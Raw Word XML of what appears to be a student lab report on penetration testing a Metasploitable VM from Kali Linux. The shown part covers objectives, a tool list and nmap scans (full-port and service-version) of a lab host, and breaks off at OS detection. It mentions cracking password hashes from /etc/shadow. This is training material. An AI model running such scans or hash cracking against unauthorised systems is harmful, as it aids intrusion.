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832AA" w14:textId="6F4B4377" w:rsidR="00A943E7" w:rsidRDefault="00A943E7" w:rsidP="00A943E7">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Minakshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Sinha </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE3773" w14:textId="38BE38E7" w:rsidR="00A943E7" w:rsidRDefault="00A943E7" w:rsidP="00D31987">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Date: 1</w:t>
      </w:r>
      <w:r w:rsidR="00137D15">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>/05/2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F69CE7E" w14:textId="77777777" w:rsidR="00A943E7" w:rsidRDefault="00A943E7" w:rsidP="00D31987">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ADCDD6B" w14:textId="77777777" w:rsidR="00A943E7" w:rsidRDefault="00A943E7" w:rsidP="00D31987">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31ABDD04" w14:textId="77777777" w:rsidR="00A943E7" w:rsidRDefault="00A943E7" w:rsidP="00D31987">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7036A2A3" w14:textId="56270306" w:rsidR="003A4900" w:rsidRPr="00D31987" w:rsidRDefault="003A4900" w:rsidP="00D70322">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00D31987">
        <w:t xml:space="preserve">Network Penetration Testing with Real-World Exploits </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36258276" w14:textId="7B0A4012" w:rsidR="003A4900" w:rsidRDefault="003A4900" w:rsidP="00D31987">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00D31987">
        <w:t>and Security Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC54B1E" w14:textId="77777777" w:rsidR="00D70322" w:rsidRDefault="00D70322" w:rsidP="00D70322"/>
    <w:p w14:paraId="776B43BA" w14:textId="77777777" w:rsidR="00D70322" w:rsidRDefault="00D70322" w:rsidP="00D70322"/>
    <w:p w14:paraId="78BB3378" w14:textId="0A530BFF" w:rsidR="00D70322" w:rsidRDefault="00A47735" w:rsidP="00A47735">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00A47735">
        <w:t>Project objectives</w:t>
      </w:r>
      <w:r w:rsidR="00F77315">
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3444E8" w14:textId="6DEFE40D" w:rsidR="00F77315" w:rsidRDefault="00F77315" w:rsidP="00F77315">
      <w:r>
        <w:t xml:space="preserve">        The objective of this project is to simulate real-world network penetration testing in a Controlled environment using Kali Linux and a vulnerable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> VM. It includes Scanning, reconnaissance, enumeration, exploitation, user privilege escalation, password Cracking, and providing remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E763EDA" w14:textId="0DD1E716" w:rsidR="00F77315" w:rsidRDefault="00DA5BBD" w:rsidP="00CF5B1B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
      <w:r w:rsidR="00CF5B1B">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505AAF14" w14:textId="51C56304" w:rsidR="00736F1A" w:rsidRDefault="00162E08" w:rsidP="00736F1A">
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="00736F1A">
        <w:t xml:space="preserve">Penetration testing is a critical component in identifying vulnerabilities and assessing the security posture of systems. This project involves ethical hacking techniques to exploit and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00736F1A">
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00736F1A">
        <w:t xml:space="preserve"> a target system. It replicates real-world exploitation techniques to uncover system weaknesses and recommend appropriate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00736F1A">
        <w:t>remediations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00736F1A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E7DF1" w14:textId="77777777" w:rsidR="003E2500" w:rsidRDefault="003E2500" w:rsidP="00736F1A"/>
    <w:p w14:paraId="0C944996" w14:textId="1B169D62" w:rsidR="003E2500" w:rsidRDefault="00736F1A" w:rsidP="00F53A73">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F53A73">
        <w:t>Theory About the Project</w:t>
      </w:r>
      <w:r w:rsidR="00B769FA" w:rsidRPr="00F53A73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB188A">
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B42310" w14:textId="56FFD169" w:rsidR="00431FB8" w:rsidRDefault="00431FB8" w:rsidP="00431FB8">
      <w:r>
        <w:t xml:space="preserve">          Network penetration testing is the process of evaluating a system’s network security by simulating</w:t>
      </w:r>
      <w:r w:rsidR="00F83FC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Attacks from malicious outsiders and insiders. The goal is to find security loopholes before attackers Do. It includes multiple phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7B71B2" w14:textId="2D4972E3" w:rsidR="00185DB8" w:rsidRDefault="00463EC2" w:rsidP="00185DB8">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00185DB8">
        <w:t>Scanning – Detecting devices and open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC5ADCE" w14:textId="77777777" w:rsidR="00185DB8" w:rsidRDefault="00185DB8" w:rsidP="00185DB8">
      <w:r>
        <w:t>2. Reconnaissance – Gathering information about services and OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A98024" w14:textId="77777777" w:rsidR="00185DB8" w:rsidRDefault="00185DB8" w:rsidP="00185DB8">
      <w:r>
        <w:t>3. Enumeration – Extracting system and service-specific data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A5C9C8" w14:textId="77777777" w:rsidR="00185DB8" w:rsidRDefault="00185DB8" w:rsidP="00185DB8">
      <w:r>
        <w:t>4. Exploitation – Leveraging vulnerabilities to gain unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3ADC4A" w14:textId="77777777" w:rsidR="00185DB8" w:rsidRDefault="00185DB8" w:rsidP="00185DB8">
      <w:r>
        <w:t>5. Privilege Escalation – Creating a new user with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C21EC88" w14:textId="77777777" w:rsidR="00185DB8" w:rsidRDefault="00185DB8" w:rsidP="00185DB8">
      <w:r>
        <w:t>6. Password Cracking – Retrieving passwords from captured hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB1D922" w14:textId="07CB38E0" w:rsidR="00431FB8" w:rsidRDefault="00185DB8" w:rsidP="00431FB8">
      <w:r>
        <w:t>7. Remediation – Providing fixes and updates for identified vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F0CC26" w14:textId="77777777" w:rsidR="00463EC2" w:rsidRDefault="00463EC2" w:rsidP="00431FB8"/>
    <w:p w14:paraId="25AE7DBA" w14:textId="5139EED5" w:rsidR="00097648" w:rsidRPr="00097648" w:rsidRDefault="00F36D83" w:rsidP="00097648">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00097648">
        <w:t>Project requirements </w:t>
      </w:r>
      <w:r w:rsidR="00097648">
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25976F90" w14:textId="3D9F9D09" w:rsidR="00BF61CF" w:rsidRPr="00BF61CF" w:rsidRDefault="00F36D83" w:rsidP="00BF61CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00097648">
        <w:t>Two Operating System</w:t>
      </w:r>
      <w:r w:rsidR="00BF61CF">
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC348CE" w14:textId="77777777" w:rsidR="00F36D83" w:rsidRDefault="00F36D83" w:rsidP="00BF61CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kali Linux (Attacking machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2FDF98" w14:textId="21CCDD01" w:rsidR="00463EC2" w:rsidRDefault="00F36D83" w:rsidP="00BF61CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> machine ( Target Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6E4003" w14:textId="77777777" w:rsidR="006105A8" w:rsidRDefault="006105A8" w:rsidP="00BA43DD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Tools Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6259AC5B" w14:textId="430662C6" w:rsidR="0082510A" w:rsidRDefault="0082510A" w:rsidP="0082510A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:r w:rsidR="00C0131E">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t>The attacker machine, containing pre-installed penetration testing tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263237D8" w14:textId="13905A72" w:rsidR="0082510A" w:rsidRDefault="0082510A" w:rsidP="0082510A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B02375">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t>A vulnerable machine to practice attacks on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A508FA" w14:textId="12ECE4F5" w:rsidR="0082510A" w:rsidRDefault="007010FE" w:rsidP="0082510A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="0082510A">
        <w:t>map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="0082510A">
        <w:t xml:space="preserve">For network scanning, port discovery, OS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2156428D" w14:textId="77777777" w:rsidR="0082510A" w:rsidRDefault="0082510A" w:rsidP="0082510A">
      <w:r>
        <w:t>detection, and service version enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC4B9AB" w14:textId="2843811F" w:rsidR="0082510A" w:rsidRDefault="0082510A" w:rsidP="0082510A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Framework</w:t>
      </w:r>
      <w:r w:rsidR="00CC5AE6">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t>For exploiting known</w:t>
      </w:r>
      <w:r w:rsidR="00CC5AE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerabilities in services running on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6967C56D" w14:textId="53E21DE8" w:rsidR="00023915" w:rsidRDefault="0082510A" w:rsidP="00023915">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>John the Ripper</w:t>
      </w:r>
      <w:r w:rsidR="00C06DCB">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t>For cracking hashed passwords obtained from /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7044FC00" w14:textId="3636765B" w:rsidR="00E648F9" w:rsidRDefault="00E648F9" w:rsidP="00EA1B55">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netca</w:t>
      </w:r>
      <w:r w:rsidR="00EA1B55">
        <w:t>t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="725C8999" w14:textId="66CEEAB8" w:rsidR="007E33DD" w:rsidRDefault="00E648F9" w:rsidP="007E33DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> VM Manager (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/VMware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E1B8CC" w14:textId="77777777" w:rsidR="007E33DD" w:rsidRDefault="007E33DD" w:rsidP="007E33DD"/>
    <w:p w14:paraId="210B4E04" w14:textId="77777777" w:rsidR="007E33DD" w:rsidRPr="008F5462" w:rsidRDefault="007E33DD" w:rsidP="008F5462">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="008F5462">
        <w:t>Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BCC1A6" w14:textId="77777777" w:rsidR="007E33DD" w:rsidRPr="004D3B4E" w:rsidRDefault="007E33DD" w:rsidP="0078579A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="004D3B4E">
        <w:t>Network Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695DE11B" w14:textId="77777777" w:rsidR="007E33DD" w:rsidRPr="0093733A" w:rsidRDefault="007E33DD" w:rsidP="0093733A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093733A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 1: Basic Network Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5191C6EA" w14:textId="77777777" w:rsidR="007E33DD" w:rsidRDefault="007E33DD" w:rsidP="007E33DD">
      <w:r>
        <w:t>Step 1: Open a terminal on your Kali Linux machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6088CD62" w14:textId="77777777" w:rsidR="007E33DD" w:rsidRDefault="007E33DD" w:rsidP="007E33DD">
      <w:r>
        <w:t xml:space="preserve">Step 2: Run a basic scan on your local network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3C024A" w14:textId="2849740D" w:rsidR="007E33DD" w:rsidRDefault="007E33DD" w:rsidP="007E33DD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -v YOUR_IP_RANGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E22057" w14:textId="0A7C57A8" w:rsidR="001006C6" w:rsidRDefault="00E62B15" w:rsidP="001006C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E62B15">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E62B15">
        <w:t xml:space="preserve"> -v 192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C2DDA8" w14:textId="017E2F0A" w:rsidR="001006C6" w:rsidRDefault="007B1D7E" w:rsidP="001006C6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56CCBB13" wp14:editId="1F82D0AC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>410210</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>289560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4024630" cy="5774055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="365963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63441" name="Picture 365963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472BD" w14:textId="0B6374A2" w:rsidR="001B4A78" w:rsidRDefault="001B4A78" w:rsidP="001B4A78"/>
    <w:p w14:paraId="2FEE0DF6" w14:textId="77777777" w:rsidR="007B1D7E" w:rsidRDefault="007B1D7E" w:rsidP="001B4A78"/>
    <w:p w14:paraId="540D54C5" w14:textId="59E747DA" w:rsidR="007B1D7E" w:rsidRDefault="00F426B0" w:rsidP="001B4A78">
      <w:r w:rsidRPr="00F426B0">
        <w:t>Task 2 – Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712E14DC" w14:textId="77777777" w:rsidR="004D6D86" w:rsidRDefault="004D6D86" w:rsidP="001B4A78"/>
    <w:p w14:paraId="78CD2765" w14:textId="77777777" w:rsidR="004D6D86" w:rsidRPr="004D6D86" w:rsidRDefault="004D6D86" w:rsidP="004D6D86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D6D86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 1: Scanning for hidden Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D4EA4" w14:textId="31F62984" w:rsidR="004D6D86" w:rsidRDefault="004D6D86" w:rsidP="004D6D86">
      <w:r>
        <w:t xml:space="preserve">Step 1: To scan for hidden ports , we have to scan whole range of ports on that specific targeted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F659BB0" w14:textId="096EDAA6" w:rsidR="003B0F1D" w:rsidRDefault="004D6D86" w:rsidP="001B4A78">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -v -p- YOUR_TARGET_IP_ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195302B9" w14:textId="675D8EFE" w:rsidR="004D6D86" w:rsidRDefault="00007A35" w:rsidP="00007A35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00007A35">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00007A35">
        <w:t xml:space="preserve"> -v -p- 192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1101751F" w14:textId="077C2DAC" w:rsidR="00E2004E" w:rsidRDefault="00A23984" w:rsidP="00E2004E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232FD91" wp14:editId="50E241A1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>442595</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>316230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5092065" cy="6399530"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1911505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05857" name="Picture 19115058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9C2" w:rsidRPr="00A079C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23984">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059EA76F" w14:textId="77777777" w:rsidR="00277A50" w:rsidRPr="00913959" w:rsidRDefault="00277A50" w:rsidP="00277A50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00913959">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Total Hidden Ports = 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328A13C2" w14:textId="77777777" w:rsidR="00277A50" w:rsidRPr="00277A50" w:rsidRDefault="00277A50" w:rsidP="00277A50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00277A50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List of hidden ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7624C96C" w14:textId="77777777" w:rsidR="00277A50" w:rsidRPr="00913959" w:rsidRDefault="00277A50" w:rsidP="00277A50">
      <w:r w:rsidRPr="00913959">
        <w:t xml:space="preserve">1. 8787 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C502D2A" w14:textId="77777777" w:rsidR="00277A50" w:rsidRPr="00913959" w:rsidRDefault="00277A50" w:rsidP="00277A50">
      <w:r w:rsidRPr="00913959">
        <w:t xml:space="preserve">2. 36588 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE1AAE8" w14:textId="77777777" w:rsidR="00277A50" w:rsidRPr="00913959" w:rsidRDefault="00277A50" w:rsidP="00277A50">
      <w:r w:rsidRPr="00913959">
        <w:t xml:space="preserve">3. 53204 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E66497E" w14:textId="77777777" w:rsidR="00277A50" w:rsidRPr="00913959" w:rsidRDefault="00277A50" w:rsidP="00277A50">
      <w:r w:rsidRPr="00913959">
        <w:t xml:space="preserve">4. 53452 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251E3DFE" w14:textId="77777777" w:rsidR="00277A50" w:rsidRPr="00913959" w:rsidRDefault="00277A50" w:rsidP="00277A50">
      <w:r w:rsidRPr="00913959">
        <w:t xml:space="preserve">5. 59437 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143CFD3D" w14:textId="77777777" w:rsidR="00277A50" w:rsidRPr="00913959" w:rsidRDefault="00277A50" w:rsidP="00277A50">
      <w:r w:rsidRPr="00913959">
        <w:t>6. 3632</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CBB6F9" w14:textId="77777777" w:rsidR="00277A50" w:rsidRPr="00913959" w:rsidRDefault="00277A50" w:rsidP="00277A50">
      <w:r w:rsidRPr="00913959">
        <w:t>7. 6697</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C372F91" w14:textId="77777777" w:rsidR="00277A50" w:rsidRPr="00913959" w:rsidRDefault="00277A50" w:rsidP="00277A50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00913959">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 2: Service Version Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E7AB5D" w14:textId="77777777" w:rsidR="00611139" w:rsidRDefault="00611139" w:rsidP="00611139">
      <w:r>
        <w:t>Step 1: Use the -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> option to detect the version of services running on open ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D5C92F" w14:textId="72A5C721" w:rsidR="004A36C3" w:rsidRDefault="00611139" w:rsidP="00E2004E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -v -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> YOUR_TARGET_IP_ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79436D72" w14:textId="7F6A6234" w:rsidR="00611139" w:rsidRDefault="005C3528" w:rsidP="006124C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C3528">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C3528">
        <w:t xml:space="preserve"> -v -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C3528">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C3528">
        <w:t xml:space="preserve"> 192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31505DCD" w14:textId="1A022626" w:rsidR="00526453" w:rsidRDefault="00CC5F4B" w:rsidP="00526453">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F7E2F75" wp14:editId="08DFE303">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-486410</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>607060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6744335" cy="4120515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="9066092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09256" name="Picture 9066092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453">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC04E9">
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F452690" w14:textId="77777777" w:rsidR="004C02AA" w:rsidRDefault="004C02AA" w:rsidP="00526453"/>
    <w:p w14:paraId="2CDDD34D" w14:textId="77777777" w:rsidR="00426D01" w:rsidRPr="00426D01" w:rsidRDefault="00426D01" w:rsidP="00426D01">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426D01">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 3: Operating System Detection</w:t>
      </w:r>
    </w:p>
